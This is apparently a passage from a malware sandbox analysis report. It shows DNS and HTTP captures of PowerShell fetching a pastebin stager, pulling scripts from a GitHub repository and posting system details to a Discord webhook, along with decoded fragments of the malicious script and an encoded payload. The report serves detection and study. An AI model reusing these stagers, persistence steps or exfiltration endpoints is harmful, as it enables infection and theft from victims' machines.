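        starts[dst].append(ts)
    summary = {}
    for dst, times in starts.items():
        times.sort()
        gaps = [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]
        summary[dst] = {"connections": len(times), "gaps_s": gaps}
    return summary


if __name__ == "__main__":
    for dst, info in connection_cadence(SAMPLE_ROWS).items():
        print(dst, info)
```

Run against the full table, the gap list for 45.144.31.105:443 is what a beaconing detector would score; the attempts here are only seconds apart, which is a retry loop rather than a quiet sleep interval. The parser refuses rows with more than one plausible reading instead of picking the first, so a run that raises points at a row that needs a different local-host or port assumption.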
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:54:01.693068027 CEST | 56627 | 53 | 192.168.2.9 | 1.1.1.1
Oct 15, 2024 15:54:01.700234890 CEST | 53 | 56627 | 1.1.1.1 | 192.168.2.9
Oct 15, 2024 15:54:03.076685905 CEST | 64628 | 53 | 192.168.2.9 | 1.1.1.1
Oct 15, 2024 15:54:03.085159063 CEST | 53 | 64628 | 1.1.1.1 | 192.168.2.9
Oct 15, 2024 15:54:03.220020056 CEST | 61840 | 53 | 192.168.2.9 | 1.1.1.1
Oct 15, 2024 15:54:03.227500916 CEST | 53 | 61840 | 1.1.1.1 | 192.168.2.9
Oct 15, 2024 15:54:32.300494909 CEST | 54867 | 53 | 192.168.2.9 | 1.1.1.1
Oct 15, 2024 15:54:32.331110954 CEST | 53 | 54867 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:01.693068027 CEST | 192.168.2.9 | 1.1.1.1 | 0xb229 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.076685905 CEST | 192.168.2.9 | 1.1.1.1 | 0x2231 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.220020056 CEST | 192.168.2.9 | 1.1.1.1 | 0xf985 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:32.300494909 CEST | 192.168.2.9 | 1.1.1.1 | 0xf8c8 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:01.700234890 CEST | 1.1.1.1 | 192.168.2.9 | 0xb229 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:01.700234890 CEST | 1.1.1.1 | 192.168.2.9 | 0xb229 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:01.700234890 CEST | 1.1.1.1 | 192.168.2.9 | 0xb229 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.085159063 CEST | 1.1.1.1 | 192.168.2.9 | 0x2231 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.085159063 CEST | 1.1.1.1 | 192.168.2.9 | 0x2231 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.085159063 CEST | 1.1.1.1 | 192.168.2.9 | 0x2231 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.085159063 CEST | 1.1.1.1 | 192.168.2.9 | 0x2231 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.085159063 CEST | 1.1.1.1 | 192.168.2.9 | 0x2231 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.227500916 CEST | 1.1.1.1 | 192.168.2.9 | 0xf985 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.227500916 CEST | 1.1.1.1 | 192.168.2.9 | 0xf985 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.227500916 CEST | 1.1.1.1 | 192.168.2.9 | 0xf985 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:03.227500916 CEST | 1.1.1.1 | 192.168.2.9 | 0xf985 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:32.331110954 CEST | 1.1.1.1 | 192.168.2.9 | 0xf8c8 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:32.331110954 CEST | 1.1.1.1 | 192.168.2.9 | 0xf8c8 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:32.331110954 CEST | 1.1.1.1 | 192.168.2.9 | 0xf8c8 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                                                                                    • pastebin.com
                                                                                    • discord.com
                                                                                    • raw.githubusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49710 | 172.67.19.24 | 80 | 4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:01.722667933 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:54:02.324925900 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:54:02 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:54:02 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304c7c0a5e0ba7-DFW
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49713 | 185.199.111.133 | 80 | 4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:03.233604908 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:03.848824978 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:03 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210121-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000444.783821,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:03 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49715 | 185.199.111.133 | 80 | 5584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:04.829592943 CEST | 227 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:05.442601919 CEST | 546 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:05 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210097-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000445.375268,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:05 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49717 | 172.67.19.24 | 80 | 5812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:09.590667963 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:54:10.223565102 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:54:10 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:54:10 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304cad4e5a4680-DFW
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49719 | 185.199.111.133 | 80 | 5812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:11.100914001 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:11.711813927 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:11 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210090-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000452.646764,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:11 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49711 | 172.67.19.24 | 443 | 4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:03 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 13:54:03 UTC | 396 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 13:54:03 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 93
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d304c815ed63474-DFW
2024-10-15 13:54:03 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 13:54:03 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49712 | 162.159.138.232 | 443 | 316 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:03 UTC | 333 | OUT | POST /api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 214
Expect: 100-continue
Connection: Keep-Alive
2024-10-15 13:54:03 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-15 13:54:03 UTC | 214 | OUT | Data Ascii: { "content": "**user** has joined - hiddenZ\n----------------------------------\n**GPU:** STP5SE\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
2024-10-15 13:54:04 UTC | 1300 | IN | HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 13:54:04 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000445
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEtpHLoB0j6E8hurvYYTiMNQi%2B1fg6KkcpNeYpMpChEZslaumo84f8Lhcx3Us24g0K%2FRZBvyo6eEiRTtgxjXH0nXZS4yEyuQu5qjpmYFI2D7qD2BAp%2F30LUjGjim"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=e5481effafbe83c674b6e60947d49a354db44d76-1729000444; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=O2791xR3gowCquLJm3YPQJlFHPawLttdxQ93ZxTPnIA-1729000444058-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d304c862a3a2e79-DFW
{"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49714 | 185.199.111.133 | 443 | 4860 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:04 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:54:04 UTC | 901 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:04 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120021-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000445.569891,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e4ce96850b49c4063a8e71b5dec1d1f31887fa5c
Expires: Tue, 15 Oct 2024 13:59:04 GMT
Source-Age: 92
2024-10-15 13:54:04 UTC | 1378 | IN | Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
2024-10-15 13:54:04 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 13:54:04 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 13:54:04 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 13:54:04 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49716 | 185.199.111.133 | 443 | 5584 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:06 UTC | 227 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 13:54:06 UTC | 903 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 159293
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "80ad5dac8b21f93f5913af03c53e98e879731d41370452cf941cf04d26ae655d"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: FE80:2F2726:B07929:C031F5:670E73FC
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:06 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210114-DFW
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1729000446.193586,VS0,VE104
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c9d0679bb26edc0aa857692b1e60d5a292a08a08
Expires: Tue, 15 Oct 2024 13:59:06 GMT
Source-Age: 0
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 24 62 79 74 65 73 20 3d 20 40 28 30 78 32 34 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 32 32 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 35 33 2c 20 30 78 30 30 2c 20 30 78 37 39
Data Ascii: $bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 36 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 46 2c 20 30 78 30 30 2c 20 30 78
Data Ascii: 0x73, 0x00, 0x73, 0x00, 0x20, 0x00, 0x66, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x20, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x69, 0x00, 0x74, 0x00, 0x79, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00, 0x2F, 0x00, 0x
2024-10-15 13:54:06 UTC | 1378 | IN | Data Raw: 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20
Data Ascii: 0, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x20, 0x00, 0x64, 0x00, 0x65, 0x00, 0x63, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x72, 0x00, 0x61, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x0A, 0x00, 0x20, 0x00, 0x20, 0x00, 0x20, 0x00,
